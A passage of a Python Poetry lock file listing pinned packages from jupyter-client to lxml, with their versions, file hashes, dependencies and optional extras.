{file = "jupyter_client-8.5.0-py3-none-any.whl", hash = "sha256:c3877aac7257ec68d79b5c622ce986bd2a992ca42f6ddc9b4dd1da50e89f7028"},
{file = "jupyter_client-8.5.0.tar.gz", hash = "sha256:e8754066510ce456358df363f97eae64b50860f30dc1fe8c6771440db3be9a63"},
]
[package.dependencies]
importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""}
jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0"
python-dateutil = ">=2.8.2"
pyzmq = ">=23.0"
tornado = ">=6.2"
traitlets = ">=5.3"
[package.extras]
docs = ["ipykernel", "myst-parser", "pydata-sphinx-theme", "sphinx (>=4)", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"]
test = ["coverage", "ipykernel (>=6.14)", "mypy", "paramiko", "pre-commit", "pytest", "pytest-cov", "pytest-jupyter[client] (>=0.4.1)", "pytest-timeout"]
[[package]]
name = "jupyter-console"
version = "6.6.3"
description = "Jupyter terminal console"
optional = false
python-versions = ">=3.7"
files = [
{file = "jupyter_console-6.6.3-py3-none-any.whl", hash = "sha256:309d33409fcc92ffdad25f0bcdf9a4a9daa61b6f341177570fdac03de5352485"},
{file = "jupyter_console-6.6.3.tar.gz", hash = "sha256:566a4bf31c87adbfadf22cdf846e3069b59a71ed5da71d6ba4d8aaad14a53539"},
]
[package.dependencies]
ipykernel = ">=6.14"
ipython = "*"
jupyter-client = ">=7.0.0"
jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0"
prompt-toolkit = ">=3.0.30"
pygments = "*"
pyzmq = ">=17"
traitlets = ">=5.4"
[package.extras]
test = ["flaky", "pexpect", "pytest"]
[[package]]
name = "jupyter-core"
version = "5.4.0"
description = "Jupyter core package. A base package on which Jupyter projects rely."
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyter_core-5.4.0-py3-none-any.whl", hash = "sha256:66e252f675ac04dcf2feb6ed4afb3cd7f68cf92f483607522dc251f32d471571"},
{file = "jupyter_core-5.4.0.tar.gz", hash = "sha256:e4b98344bb94ee2e3e6c4519a97d001656009f9cb2b7f2baf15b3c205770011d"},
]
[package.dependencies]
platformdirs = ">=2.5"
pywin32 = {version = ">=300", markers = "sys_platform == \"win32\" and platform_python_implementation != \"PyPy\""}
traitlets = ">=5.3"
[package.extras]
docs = ["myst-parser", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling", "traitlets"]
test = ["ipykernel", "pre-commit", "pytest", "pytest-cov", "pytest-timeout"]
[[package]]
name = "jupyter-events"
version = "0.8.0"
description = "Jupyter Event System library"
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyter_events-0.8.0-py3-none-any.whl", hash = "sha256:81f07375c7673ff298bfb9302b4a981864ec64edaed75ca0fe6f850b9b045525"},
{file = "jupyter_events-0.8.0.tar.gz", hash = "sha256:fda08f0defce5e16930542ce60634ba48e010830d50073c3dfd235759cee77bf"},
]
[package.dependencies]
jsonschema = {version = ">=4.18.0", extras = ["format-nongpl"]}
python-json-logger = ">=2.0.4"
pyyaml = ">=5.3"
referencing = "*"
rfc3339-validator = "*"
rfc3986-validator = ">=0.1.1"
traitlets = ">=5.3"
[package.extras]
cli = ["click", "rich"]
docs = ["jupyterlite-sphinx", "myst-parser", "pydata-sphinx-theme", "sphinxcontrib-spelling"]
test = ["click", "pre-commit", "pytest (>=7.0)", "pytest-asyncio (>=0.19.0)", "pytest-console-scripts", "rich"]
[[package]]
name = "jupyter-lsp"
version = "2.2.0"
description = "Multi-Language Server WebSocket proxy for Jupyter Notebook/Lab server"
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyter-lsp-2.2.0.tar.gz", hash = "sha256:8ebbcb533adb41e5d635eb8fe82956b0aafbf0fd443b6c4bfa906edeeb8635a1"},
{file = "jupyter_lsp-2.2.0-py3-none-any.whl", hash = "sha256:9e06b8b4f7dd50300b70dd1a78c0c3b0c3d8fa68e0f2d8a5d1fbab62072aca3f"},
]
[package.dependencies]
importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""}
jupyter-server = ">=1.1.2"
[[package]]
name = "jupyter-server"
version = "2.9.1"
description = "The backend—i.e. core services, APIs, and REST endpoints—to Jupyter web applications."
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyter_server-2.9.1-py3-none-any.whl", hash = "sha256:21ad1a3d455d5a79ce4bef5201925cd17510c17898cf9d54e3ccfb6b12734948"},
{file = "jupyter_server-2.9.1.tar.gz", hash = "sha256:9ba71be4b9c16e479e4c50c929f8ac4b1015baf90237a08681397a98c76c7e5e"},
]
[package.dependencies]
anyio = ">=3.1.0"
argon2-cffi = "*"
jinja2 = "*"
jupyter-client = ">=7.4.4"
jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0"
jupyter-events = ">=0.6.0"
jupyter-server-terminals = "*"
nbconvert = ">=6.4.4"
nbformat = ">=5.3.0"
overrides = "*"
packaging = "*"
prometheus-client = "*"
pywinpty = {version = "*", markers = "os_name == \"nt\""}
pyzmq = ">=24"
send2trash = ">=1.8.2"
terminado = ">=0.8.3"
tornado = ">=6.2.0"
traitlets = ">=5.6.0"
websocket-client = "*"
[package.extras]
docs = ["ipykernel", "jinja2", "jupyter-client", "jupyter-server", "myst-parser", "nbformat", "prometheus-client", "pydata-sphinx-theme", "send2trash", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-openapi (>=0.8.0)", "sphinxcontrib-spelling", "sphinxemoji", "tornado", "typing-extensions"]
test = ["flaky", "ipykernel", "pre-commit", "pytest (>=7.0)", "pytest-console-scripts", "pytest-jupyter[server] (>=0.4)", "pytest-timeout", "requests"]
[[package]]
name = "jupyter-server-terminals"
version = "0.4.4"
description = "A Jupyter Server Extension Providing Terminals."
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyter_server_terminals-0.4.4-py3-none-any.whl", hash = "sha256:75779164661cec02a8758a5311e18bb8eb70c4e86c6b699403100f1585a12a36"},
{file = "jupyter_server_terminals-0.4.4.tar.gz", hash = "sha256:57ab779797c25a7ba68e97bcfb5d7740f2b5e8a83b5e8102b10438041a7eac5d"},
]
[package.dependencies]
pywinpty = {version = ">=2.0.3", markers = "os_name == \"nt\""}
terminado = ">=0.8.3"
[package.extras]
docs = ["jinja2", "jupyter-server", "mistune (<3.0)", "myst-parser", "nbformat", "packaging", "pydata-sphinx-theme", "sphinxcontrib-github-alt", "sphinxcontrib-openapi", "sphinxcontrib-spelling", "sphinxemoji", "tornado"]
test = ["coverage", "jupyter-server (>=2.0.0)", "pytest (>=7.0)", "pytest-cov", "pytest-jupyter[server] (>=0.5.3)", "pytest-timeout"]
[[package]]
name = "jupyterlab"
version = "4.0.7"
description = "JupyterLab computational environment"
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyterlab-4.0.7-py3-none-any.whl", hash = "sha256:08683045117cc495531fdb39c22ababb9aaac6977a45e67cfad20046564c9c7c"},
{file = "jupyterlab-4.0.7.tar.gz", hash = "sha256:48792efd9f962b2bcda1f87d72168ff122c288b1d97d32109e4a11b33dc862be"},
]
[package.dependencies]
async-lru = ">=1.0.0"
importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""}
importlib-resources = {version = ">=1.4", markers = "python_version < \"3.9\""}
ipykernel = "*"
jinja2 = ">=3.0.3"
jupyter-core = "*"
jupyter-lsp = ">=2.0.0"
jupyter-server = ">=2.4.0,<3"
jupyterlab-server = ">=2.19.0,<3"
notebook-shim = ">=0.2"
packaging = "*"
tomli = {version = "*", markers = "python_version < \"3.11\""}
tornado = ">=6.2.0"
traitlets = "*"
[package.extras]
dev = ["black[jupyter] (==23.7.0)", "build", "bump2version", "coverage", "hatch", "pre-commit", "pytest-cov", "ruff (==0.0.286)"]
docs = ["jsx-lexer", "myst-parser", "pydata-sphinx-theme (>=0.13.0)", "pytest", "pytest-check-links", "pytest-tornasync", "sphinx (>=1.8,<7.2.0)", "sphinx-copybutton"]
docs-screenshots = ["altair (==5.0.1)", "ipython (==8.14.0)", "ipywidgets (==8.0.6)", "jupyterlab-geojson (==3.4.0)", "jupyterlab-language-pack-zh-cn (==4.0.post0)", "matplotlib (==3.7.1)", "nbconvert (>=7.0.0)", "pandas (==2.0.2)", "scipy (==1.10.1)", "vega-datasets (==0.9.0)"]
test = ["coverage", "pytest (>=7.0)", "pytest-check-links (>=0.7)", "pytest-console-scripts", "pytest-cov", "pytest-jupyter (>=0.5.3)", "pytest-timeout", "pytest-tornasync", "requests", "requests-cache", "virtualenv"]
[[package]]
name = "jupyterlab-pygments"
version = "0.2.2"
description = "Pygments theme using JupyterLab CSS variables"
optional = false
python-versions = ">=3.7"
files = [
{file = "jupyterlab_pygments-0.2.2-py2.py3-none-any.whl", hash = "sha256:2405800db07c9f770863bcf8049a529c3dd4d3e28536638bd7c1c01d2748309f"},
{file = "jupyterlab_pygments-0.2.2.tar.gz", hash = "sha256:7405d7fde60819d905a9fa8ce89e4cd830e318cdad22a0030f7a901da705585d"},
]
[[package]]
name = "jupyterlab-server"
version = "2.25.0"
description = "A set of server components for JupyterLab and JupyterLab like applications."
optional = false
python-versions = ">=3.8"
files = [
{file = "jupyterlab_server-2.25.0-py3-none-any.whl", hash = "sha256:c9f67a98b295c5dee87f41551b0558374e45d449f3edca153dd722140630dcb2"},
{file = "jupyterlab_server-2.25.0.tar.gz", hash = "sha256:77c2f1f282d610f95e496e20d5bf1d2a7706826dfb7b18f3378ae2870d272fb7"},
]
[package.dependencies]
babel = ">=2.10"
importlib-metadata = {version = ">=4.8.3", markers = "python_version < \"3.10\""}
jinja2 = ">=3.0.3"
json5 = ">=0.9.0"
jsonschema = ">=4.18.0"
jupyter-server = ">=1.21,<3"
packaging = ">=21.3"
requests = ">=2.31"
[package.extras]
docs = ["autodoc-traits", "jinja2 (<3.2.0)", "mistune (<4)", "myst-parser", "pydata-sphinx-theme", "sphinx", "sphinx-copybutton", "sphinxcontrib-openapi (>0.8)"]
openapi = ["openapi-core (>=0.18.0,<0.19.0)", "ruamel-yaml"]
test = ["hatch", "ipykernel", "openapi-core (>=0.18.0,<0.19.0)", "openapi-spec-validator (>=0.6.0,<0.7.0)", "pytest (>=7.0)", "pytest-console-scripts", "pytest-cov", "pytest-jupyter[server] (>=0.6.2)", "pytest-timeout", "requests-mock", "ruamel-yaml", "sphinxcontrib-spelling", "strict-rfc3339", "werkzeug"]
[[package]]
name = "jupyterlab-widgets"
version = "3.0.9"
description = "Jupyter interactive widgets for JupyterLab"
optional = false
python-versions = ">=3.7"
files = [
{file = "jupyterlab_widgets-3.0.9-py3-none-any.whl", hash = "sha256:3cf5bdf5b897bf3bccf1c11873aa4afd776d7430200f765e0686bd352487b58d"},
{file = "jupyterlab_widgets-3.0.9.tar.gz", hash = "sha256:6005a4e974c7beee84060fdfba341a3218495046de8ae3ec64888e5fe19fdb4c"},
]
[[package]]
name = "keras"
version = "2.11.0"
description = "Deep learning for humans."
optional = true
python-versions = ">=3.7"
files = [
{file = "keras-2.11.0-py2.py3-none-any.whl", hash = "sha256:38c6fff0ea9a8b06a2717736565c92a73c8cd9b1c239e7125ccb188b7848f65e"},
]
[[package]]
name = "lancedb"
version = "0.1.16"
description = "lancedb"
optional = true
python-versions = ">=3.8"
files = [
{file = "lancedb-0.1.16-py3-none-any.whl", hash = "sha256:ed5ff765c127fd8c8b193b448a127ae9de4afd458874e6d981edeafa09cf6a4a"},
{file = "lancedb-0.1.16.tar.gz", hash = "sha256:c22621635ca1b74f24983b8247886f93d23d7477fdbe5c67449a0939c19ef7bd"},
]
[package.dependencies]
aiohttp = "*"
attr = "*"
pydantic = "*"
pylance = "0.5.10"
ratelimiter = "*"
retry = "*"
semver = "*"
tqdm = "*"
[package.extras]
dev = ["black", "pre-commit", "ruff"]
docs = ["mkdocs", "mkdocs-jupyter", "mkdocs-material", "mkdocstrings[python]"]
tests = ["pandas (>=1.4)", "pytest", "pytest-asyncio", "pytest-mock"]
[[package]]
name = "langkit"
version = "0.0.22"
description = "A collection of text metric udfs for whylogs profiling and monitoring in WhyLabs"
optional = true
python-versions = ">=3.8,<4"
files = [
{file = "langkit-0.0.22-py3-none-any.whl", hash = "sha256:9f0f0a5311648f08adbb250dcd49ad761b1e3ee0834d860b8660f931f8b7d771"},
{file = "langkit-0.0.22.tar.gz", hash = "sha256:7a94a8c24e1838da913f999a0ad699971cdf7c31c179e6a8e6ba69b0f6e8570f"},
]
[package.dependencies]
pandas = "*"
textstat = ">=0.7.3,<0.8.0"
whylogs = ">=1.3.9,<2.0.0"
xformers = {version = "*", markers = "python_full_version >= \"3.8.0\" and python_version < \"4\" and sys_platform == \"!macos\""}
[package.extras]
all = ["datasets (>=2.12.0,<3.0.0)", "evaluate (>=0.4.0,<0.5.0)", "faiss-cpu (>=1.7.1,<2.0.0)", "ipywidgets (>=8.1.1,<9.0.0)", "nltk (>=3.8.1,<4.0.0)", "numpy", "openai (>=0.27.6,<0.28.0)", "sentence-transformers (>=2.2.2,<3.0.0)", "torch"]
[[package]]
name = "langsmith"
version = "0.0.53"
description = "Client library to connect to the LangSmith LLM Tracing and Evaluation Platform."
optional = false
python-versions = ">=3.8.1,<4.0"
files = [
{file = "langsmith-0.0.53-py3-none-any.whl", hash = "sha256:a090b1c7d7968fb8d2476ddd608a5171f0e812a82b1bca29ca136cdea375a74e"},
{file = "langsmith-0.0.53.tar.gz", hash = "sha256:a426a1d39843207a5dd3d72787b5304376541eb818509ee7909bbb696b072488"},
]
[package.dependencies]
pydantic = ">=1,<3"
requests = ">=2,<3"
[[package]]
name = "lark"
version = "1.1.8"
description = "a modern parsing library"
optional = false
python-versions = ">=3.6"
files = [
{file = "lark-1.1.8-py3-none-any.whl", hash = "sha256:7d2c221a66a8165f3f81aacb958d26033d40d972fdb70213ab0a2e0627e29c86"},
{file = "lark-1.1.8.tar.gz", hash = "sha256:7ef424db57f59c1ffd6f0d4c2b705119927f566b68c0fe1942dddcc0e44391a5"},
]
[package.extras]
atomic-cache = ["atomicwrites"]
interegular = ["interegular (>=0.3.1,<0.4.0)"]
nearley = ["js2py"]
regex = ["regex"]
[[package]]
name = "lazy-loader"
version = "0.3"
description = "lazy_loader"
optional = true
python-versions = ">=3.7"
files = [
{file = "lazy_loader-0.3-py3-none-any.whl", hash = "sha256:1e9e76ee8631e264c62ce10006718e80b2cfc74340d17d1031e0f84af7478554"},
{file = "lazy_loader-0.3.tar.gz", hash = "sha256:3b68898e34f5b2a29daaaac172c6555512d0f32074f147e2254e4a6d9d838f37"},
]
[package.extras]
lint = ["pre-commit (>=3.3)"]
test = ["pytest (>=7.4)", "pytest-cov (>=4.1)"]
[[package]]
name = "libclang"
version = "16.0.6"
description = "Clang Python Bindings, mirrored from the official LLVM repo: https://github.com/llvm/llvm-project/tree/main/clang/bindings/python, to make the installation process easier."
optional = true
python-versions = "*"
files = [
{file = "libclang-16.0.6-1-py2.py3-none-manylinux2014_aarch64.whl", hash = "sha256:88bc7e7b393c32e41e03ba77ef02fdd647da1f764c2cd028e69e0837080b79f6"},
{file = "libclang-16.0.6-1-py2.py3-none-manylinux2014_armv7l.whl", hash = "sha256:d80ed5827736ed5ec2bcedf536720476fd9d4fa4c79ef0cb24aea4c59332f361"},
{file = "libclang-16.0.6-py2.py3-none-macosx_10_9_x86_64.whl", hash = "sha256:da9e47ebc3f0a6d90fb169ef25f9fbcd29b4a4ef97a8b0e3e3a17800af1423f4"},
{file = "libclang-16.0.6-py2.py3-none-macosx_11_0_arm64.whl", hash = "sha256:e1a5ad1e895e5443e205568c85c04b4608e4e973dae42f4dfd9cb46c81d1486b"},
{file = "libclang-16.0.6-py2.py3-none-manylinux2010_x86_64.whl", hash = "sha256:9dcdc730939788b8b69ffd6d5d75fe5366e3ee007f1e36a99799ec0b0c001492"},
{file = "libclang-16.0.6-py2.py3-none-manylinux2014_aarch64.whl", hash = "sha256:8130482120500476a027171f8f3c8dfc2536b591716eea71fc5da22cae13131b"},
{file = "libclang-16.0.6-py2.py3-none-manylinux2014_armv7l.whl", hash = "sha256:1e940048f51d0b0999099a9b78629ab8a64b62af5e9ff1b2b062439c21ee244d"},
{file = "libclang-16.0.6-py2.py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:f04e3060ae1f207f234d0608900c99c50edcb743e5e18276d78da2ddd727d39f"},
{file = "libclang-16.0.6-py2.py3-none-win_amd64.whl", hash = "sha256:daab4a11dae228f1efa9efa3fe638b493b14d8d52c71fb3c7019e2f1df4514c2"},
{file = "libclang-16.0.6-py2.py3-none-win_arm64.whl", hash = "sha256:4a9acbfd9c135a72f80d5dbff7588dfb0c81458244a89b9e83526e8595880e0a"},
{file = "libclang-16.0.6.tar.gz", hash = "sha256:4acdde39dfe410c877b4ccc0d4b57eb952100e4ee26bbdf6cfdb88e2033a7d31"},
]
[[package]]
name = "libdeeplake"
version = "0.0.84"
description = "C++ backend for Deep Lake"
optional = true
python-versions = "*"
files = [
{file = "libdeeplake-0.0.84-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:b24e7d025ce29b0e1505c8b952f2e7eda454461fefc9bad61ddc804d1b081c80"},
{file = "libdeeplake-0.0.84-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:dc120ec1cb4fe3f49bfbf02e0a5e8e15129329083ab74f1d618cfe71867eeb61"},
{file = "libdeeplake-0.0.84-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:d94c419063d6e96c4defc5fcdce2a9e143a668bb9292105a2abb8040fbef519e"},
{file = "libdeeplake-0.0.84-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:65e6eab3b1920acef9fbfd5ecb11c4521c38e66bff0b3f02a0760c7d5722e242"},
{file = "libdeeplake-0.0.84-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:3a3a2acf2deef3a72bcde1856a025b13bd594267e84ada91bc79a8881606f29a"},
{file = "libdeeplake-0.0.84-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:69cea8d6d5e736a1a655c191d9192d47c93543f68fc08703a3660b327b2ea8af"},
{file = "libdeeplake-0.0.84-cp311-cp311-manylinux2014_aarch64.whl", hash = "sha256:d4be0dc25d01d07fb3e3cb61d8ff287520fa21f7eeb5190cb8ac38bc32e24a13"},
{file = "libdeeplake-0.0.84-cp311-cp311-manylinux2014_x86_64.whl", hash = "sha256:74798f43084827025e783cedee6e480699cf8c00b89730fc98d39fae8a48bba7"},
{file = "libdeeplake-0.0.84-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:6b9b489254ae2ed18a59eb3ebb9b0229dbd68dfbff695ed61a8b7707cbeae188"},
{file = "libdeeplake-0.0.84-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:f6dfd25181d80fedcb57f93a3e14ba15918b19e30e6758c8868ec452ec4c3d31"},
{file = "libdeeplake-0.0.84-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:bb2f2a0b9c292b342e33e87c9f08f8eed8bc4c0a1b2d16d44a48fc1553a77860"},
{file = "libdeeplake-0.0.84-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:c61696a92b0e07c2ecec5faebb5f78a3f1aae54b12bd84ca553a2d8b9dfdc539"},
{file = "libdeeplake-0.0.84-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:7983b44e2efb541ecaa0960abe2f15eabf1f2567ff2b6c6042b261c5b3399a65"},
{file = "libdeeplake-0.0.84-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:6cd70f8955dd63247cbc56cf7128d948184a0ebf080b46476142bc701a1fc090"},
{file = "libdeeplake-0.0.84-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:553a22bc3c887fdfa5a73a049f72594170e3e0098c0801f7112e64861f25faf2"},
{file = "libdeeplake-0.0.84-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f5b8bc4243c26132bfc87c5dec9c64d42bb9e330a0055a2d8c965daaa0b19927"},
{file = "libdeeplake-0.0.84-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:8bded8b6b3d9055bcb21ba34a2dc8384d84ba61042f8f030ab765f93709029ae"},
{file = "libdeeplake-0.0.84-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:301dab8e7894bc02431173a4d084271a1e451758f3e99b7029d48b5333c0d849"},
]
[package.dependencies]
dill = "*"
numpy = "*"
[[package]]
name = "librosa"
version = "0.10.1"
description = "Python module for audio and music processing"
optional = true
python-versions = ">=3.7"
files = [
{file = "librosa-0.10.1-py3-none-any.whl", hash = "sha256:7ab91d9f5fcb75ea14848a05d3b1f825cf8d0c42ca160d19ae6874f2de2d8223"},
{file = "librosa-0.10.1.tar.gz", hash = "sha256:832f7d150d6dd08ed2aa08c0567a4be58330635c32ddd2208de9bc91300802c7"},
]
[package.dependencies]
audioread = ">=2.1.9"
decorator = ">=4.3.0"
joblib = ">=0.14"
lazy-loader = ">=0.1"
msgpack = ">=1.0"
numba = ">=0.51.0"
numpy = ">=1.20.3,<1.22.0 || >1.22.0,<1.22.1 || >1.22.1,<1.22.2 || >1.22.2"
pooch = ">=1.0"
scikit-learn = ">=0.20.0"
scipy = ">=1.2.0"
soundfile = ">=0.12.1"
soxr = ">=0.3.2"
typing-extensions = ">=4.1.1"
[package.extras]
display = ["matplotlib (>=3.3.0)"]
docs = ["ipython (>=7.0)", "matplotlib (>=3.3.0)", "mir-eval (>=0.5)", "numba (>=0.51)", "numpydoc", "presets", "sphinx (!=1.3.1)", "sphinx-gallery (>=0.7)", "sphinx-multiversion (>=0.2.3)", "sphinx-rtd-theme (>=1.2.0)", "sphinxcontrib-svg2pdfconverter"]
tests = ["matplotlib (>=3.3.0)", "packaging (>=20.0)", "pytest", "pytest-cov", "pytest-mpl", "resampy (>=0.2.2)", "samplerate", "types-decorator"]
[[package]]
name = "llvmlite"
version = "0.41.1"
description = "lightweight wrapper around basic LLVM functionality"
optional = true
python-versions = ">=3.8"
files = [
{file = "llvmlite-0.41.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c1e1029d47ee66d3a0c4d6088641882f75b93db82bd0e6178f7bd744ebce42b9"},
{file = "llvmlite-0.41.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:150d0bc275a8ac664a705135e639178883293cf08c1a38de3bbaa2f693a0a867"},
{file = "llvmlite-0.41.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1eee5cf17ec2b4198b509272cf300ee6577229d237c98cc6e63861b08463ddc6"},
{file = "llvmlite-0.41.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0dd0338da625346538f1173a17cabf21d1e315cf387ca21b294ff209d176e244"},
{file = "llvmlite-0.41.1-cp310-cp310-win32.whl", hash = "sha256:fa1469901a2e100c17eb8fe2678e34bd4255a3576d1a543421356e9c14d6e2ae"},
{file = "llvmlite-0.41.1-cp310-cp310-win_amd64.whl", hash = "sha256:2b76acee82ea0e9304be6be9d4b3840208d050ea0dcad75b1635fa06e949a0ae"},
{file = "llvmlite-0.41.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:210e458723436b2469d61b54b453474e09e12a94453c97ea3fbb0742ba5a83d8"},
{file = "llvmlite-0.41.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:855f280e781d49e0640aef4c4af586831ade8f1a6c4df483fb901cbe1a48d127"},
{file = "llvmlite-0.41.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b67340c62c93a11fae482910dc29163a50dff3dfa88bc874872d28ee604a83be"},
{file = "llvmlite-0.41.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2181bb63ef3c607e6403813421b46982c3ac6bfc1f11fa16a13eaafb46f578e6"},
{file = "llvmlite-0.41.1-cp311-cp311-win_amd64.whl", hash = "sha256:9564c19b31a0434f01d2025b06b44c7ed422f51e719ab5d24ff03b7560066c9a"},
{file = "llvmlite-0.41.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5940bc901fb0325970415dbede82c0b7f3e35c2d5fd1d5e0047134c2c46b3281"},
{file = "llvmlite-0.41.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8b0a9a47c28f67a269bb62f6256e63cef28d3c5f13cbae4fab587c3ad506778b"},
{file = "llvmlite-0.41.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f8afdfa6da33f0b4226af8e64cfc2b28986e005528fbf944d0a24a72acfc9432"},
{file = "llvmlite-0.41.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8454c1133ef701e8c050a59edd85d238ee18bb9a0eb95faf2fca8b909ee3c89a"},
{file = "llvmlite-0.41.1-cp38-cp38-win32.whl", hash = "sha256:2d92c51e6e9394d503033ffe3292f5bef1566ab73029ec853861f60ad5c925d0"},
{file = "llvmlite-0.41.1-cp38-cp38-win_amd64.whl", hash = "sha256:df75594e5a4702b032684d5481db3af990b69c249ccb1d32687b8501f0689432"},
{file = "llvmlite-0.41.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:04725975e5b2af416d685ea0769f4ecc33f97be541e301054c9f741003085802"},
{file = "llvmlite-0.41.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:bf14aa0eb22b58c231243dccf7e7f42f7beec48970f2549b3a6acc737d1a4ba4"},
{file = "llvmlite-0.41.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:92c32356f669e036eb01016e883b22add883c60739bc1ebee3a1cc0249a50828"},
{file = "llvmlite-0.41.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:24091a6b31242bcdd56ae2dbea40007f462260bc9bdf947953acc39dffd54f8f"},
{file = "llvmlite-0.41.1-cp39-cp39-win32.whl", hash = "sha256:880cb57ca49e862e1cd077104375b9d1dfdc0622596dfa22105f470d7bacb309"},
{file = "llvmlite-0.41.1-cp39-cp39-win_amd64.whl", hash = "sha256:92f093986ab92e71c9ffe334c002f96defc7986efda18397d0f08534f3ebdc4d"},
{file = "llvmlite-0.41.1.tar.gz", hash = "sha256:f19f767a018e6ec89608e1f6b13348fa2fcde657151137cb64e56d48598a92db"},
]
[[package]]
name = "loguru"
version = "0.7.2"
description = "Python logging made (stupidly) simple"
optional = true
python-versions = ">=3.5"
files = [
{file = "loguru-0.7.2-py3-none-any.whl", hash = "sha256:003d71e3d3ed35f0f8984898359d65b79e5b21943f78af86aa5491210429b8eb"},
{file = "loguru-0.7.2.tar.gz", hash = "sha256:e671a53522515f34fd406340ee968cb9ecafbc4b36c679da03c18fd8d0bd51ac"},
]
[package.dependencies]
colorama = {version = ">=0.3.4", markers = "sys_platform == \"win32\""}
win32-setctime = {version = ">=1.0.0", markers = "sys_platform == \"win32\""}
[package.extras]
dev = ["Sphinx (==7.2.5)", "colorama (==0.4.5)", "colorama (==0.4.6)", "exceptiongroup (==1.1.3)", "freezegun (==1.1.0)", "freezegun (==1.2.2)", "mypy (==v0.910)", "mypy (==v0.971)", "mypy (==v1.4.1)", "mypy (==v1.5.1)", "pre-commit (==3.4.0)", "pytest (==6.1.2)", "pytest (==7.4.0)", "pytest-cov (==2.12.1)", "pytest-cov (==4.1.0)", "pytest-mypy-plugins (==1.9.3)", "pytest-mypy-plugins (==3.0.0)", "sphinx-autobuild (==2021.3.14)", "sphinx-rtd-theme (==1.3.0)", "tox (==3.27.1)", "tox (==4.11.0)"]
[[package]]
name = "lxml"
version = "4.9.3"
description = "Powerful and Pythonic XML processing library combining libxml2/libxslt with the ElementTree API."
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, != 3.4.*"
files = [
{file = "lxml-4.9.3-cp27-cp27m-macosx_11_0_x86_64.whl", hash = "sha256:b0a545b46b526d418eb91754565ba5b63b1c0b12f9bd2f808c852d9b4b2f9b5c"},
{file = "lxml-4.9.3-cp27-cp27m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:075b731ddd9e7f68ad24c635374211376aa05a281673ede86cbe1d1b3455279d"},
{file = "lxml-4.9.3-cp27-cp27m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:1e224d5755dba2f4a9498e150c43792392ac9b5380aa1b845f98a1618c94eeef"},
{file = "lxml-4.9.3-cp27-cp27m-win32.whl", hash = "sha256:2c74524e179f2ad6d2a4f7caf70e2d96639c0954c943ad601a9e146c76408ed7"},
{file = "lxml-4.9.3-cp27-cp27m-win_amd64.whl", hash = "sha256:4f1026bc732b6a7f96369f7bfe1a4f2290fb34dce00d8644bc3036fb351a4ca1"},
{file = "lxml-4.9.3-cp27-cp27mu-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c0781a98ff5e6586926293e59480b64ddd46282953203c76ae15dbbbf302e8bb"},
{file = "lxml-4.9.3-cp27-cp27mu-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cef2502e7e8a96fe5ad686d60b49e1ab03e438bd9123987994528febd569868e"},
{file = "lxml-4.9.3-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:b86164d2cff4d3aaa1f04a14685cbc072efd0b4f99ca5708b2ad1b9b5988a991"},
{file = "lxml-4.9.3-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:42871176e7896d5d45138f6d28751053c711ed4d48d8e30b498da155af39aebd"},
